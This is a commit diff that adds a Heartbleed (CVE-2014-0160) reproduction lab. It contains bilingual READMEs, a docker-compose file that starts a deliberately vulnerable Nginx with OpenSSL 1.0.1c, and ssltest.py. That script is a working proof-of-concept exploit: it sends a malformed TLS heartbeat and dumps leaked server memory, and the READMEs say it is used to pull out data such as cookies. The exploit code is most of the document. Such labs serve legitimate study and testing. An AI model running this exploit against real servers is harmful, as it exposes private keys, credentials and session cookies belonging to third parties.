first commit

openssl/CVE-2014-0160/README.md

@@ -0,0 +1,34 @@
+# OpenSSL Heartbleed Memory Leak Leads to Information Disclosure (CVE-2014-0160)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
+
+The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
+
+References:
+
+- https://heartbleed.com/
+- https://filippo.io/Heartbleed
+
+## Setup
+
+Execute following command to start a Nginx server with OpenSSL 1.0.1c:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `https://your-ip:8443` to see the welcome page.
+
+> We have encountered an error when running this environment where some AMD architecture CPUs were unable to access the https page successfully. If you have a similar problem, try an Intel CPU instead.
+
+## POC
+
+Visit `https://filippo.io/Heartbleed` to check the result:
+
+![](1.png)
+
+Run [ssltest.py](ssltest.py) with Python to obtain sensitive data (such as Cookie):
+
+![](2.png)

openssl/CVE-2014-0160/README.zh-cn.md

@@ -0,0 +1,30 @@
+# OpenSSL 心脏出血内存泄露漏洞（CVE-2014-0160）
+
+心脏出血是OpenSSL库中的一个内存漏洞，攻击者利用这个漏洞可以服务到目标进程内存信息，如其他人的Cookie等敏感信息。
+
+参考链接：
+
+- https://heartbleed.com/
+- https://filippo.io/Heartbleed
+
+## 环境搭建
+
+运行如下命令启动一个使用了OpenSSL 1.0.1c的Nginx服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`https://your-ip:8443`即可查看到hello页面（需要忽略https错误）。
+
+> 我们在运行这个环境的时候遇到过一个错误，部分AMD架构的CPU无法成功访问https页面，如果你也遇到过类似的问题，可以换Intel CPU试试。
+
+## 漏洞复现
+
+访问<https://filippo.io/Heartbleed>进行在线检测：
+
+![](1.png)
+
+Python运行[ssltest.py](ssltest.py)，拿到敏感数据（Cookie）：
+
+![](2.png)

openssl/CVE-2014-0160/docker-compose.yml

@@ -0,0 +1,9 @@
+version: '2'
+services:
+ nginx:
+   image: vulhub/openssl:1.0.1c-with-nginx
+   volumes:
+    - ./www:/var/www/html
+   ports:
+    - "8080:80"
+    - "8443:443"

openssl/CVE-2014-0160/ssltest.py

@@ -0,0 +1,138 @@
+#!/usr/bin/python
+
+# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
+# The author disclaims copyright to this source code.
+
+import sys
+import struct
+import socket
+import time
+import select
+import binascii
+import re
+from optparse import OptionParser
+
+options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
+options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
+
+def h2bin(x):
+    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))
+
+hello = h2bin('''
+16 03 02 00 dc 01 00 00 d8 03 02 53
+43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
+bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
+00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
+00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
+c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
+c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
+c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
+c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
+00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
+03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
+00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
+00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
+00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
+00 0f 00 01 01                                  
+''')
+
+hb = h2bin(''' 
+18 03 02 00 03
+01 40 00
+''')
+
+def hexdump(s: bytes):
+    for b in range(0, len(s), 16):
+        lin = [c for c in s[b : b + 16]]
+        hxdat = ' '.join('%02X' % c for c in lin)
+        pdat = ''.join((chr(c) if 32 <= c <= 126 else '.' )for c in lin)
+        print('  %04x: %-48s %s' % (b, hxdat, pdat))
+    
+    print("")
+
+def recvall(s, length, timeout=5):
+    endtime = time.time() + timeout
+    rdata = b''
+    remain = length
+    while remain > 0:
+        rtime = endtime - time.time() 
+        if rtime < 0:
+            return None
+        r, w, e = select.select([s], [], [], 5)
+        if s in r:
+            data = s.recv(remain)
+            # EOF?
+            if not data:
+                return None
+            rdata += data
+            remain -= len(data)
+    return rdata
+        
+
+def recvmsg(s):
+    hdr = recvall(s, 5)
+    if hdr is None:
+        print('Unexpected EOF receiving record header - server closed connection')
+        return None, None, None
+    typ, ver, ln = struct.unpack('>BHH', hdr)
+    pay = recvall(s, ln, 10)
+    if pay is None:
+        print('Unexpected EOF receiving record payload - server closed connection')
+        return None, None, None
+    print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
+    return typ, ver, pay
+
+def hit_hb(s):
+    s.send(hb)
+    while True:
+        typ, ver, pay = recvmsg(s)
+        if typ is None:
+            print('No heartbeat response received, server likely not vulnerable')
+            return False
+
+        if typ == 24:
+            print('Received heartbeat response:')
+            hexdump(pay)
+            if len(pay) > 3:
+                print('WARNING: server returned more data than it should - server is vulnerable!')
+            else:
+                print('Server processed malformed heartbeat, but did not return any extra data.')
+            return True
+
+        if typ == 21:
+            print('Received alert:')
+            hexdump(pay)
+            print('Server returned error, likely not vulnerable')
+            return False
+
+def main():
+    opts, args = options.parse_args()
+    if len(args) < 1:
+        options.print_help()
+        return
+
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    print('Connecting...')
+    sys.stdout.flush()
+    s.connect((args[0], opts.port))
+    print('Sending Client Hello...')
+    sys.stdout.flush()
+    s.send(hello)
+    print('Waiting for Server Hello...')
+    sys.stdout.flush()
+    while True:
+        typ, ver, pay = recvmsg(s)
+        if typ == None:
+            print('Server closed connection without sending Server Hello.')
+            return
+        # Look for server hello done message.
+        if typ == 22 and pay[0] == 0x0E:
+            break
+
+    print('Sending heartbeat request...')
+    sys.stdout.flush()
+    s.send(hb)
+    hit_hb(s)
+
+if __name__ == '__main__':
+    main()

openssl/CVE-2014-0160/www/index.html

@@ -0,0 +1,9 @@
+<html>
+    <head>
+        <meta charset="utf-8">
+        <title>Heartbleed Test</title>
+    </head>
+    <body>
+        <p>Heartbleed Test</p>
+    </body>
+</html>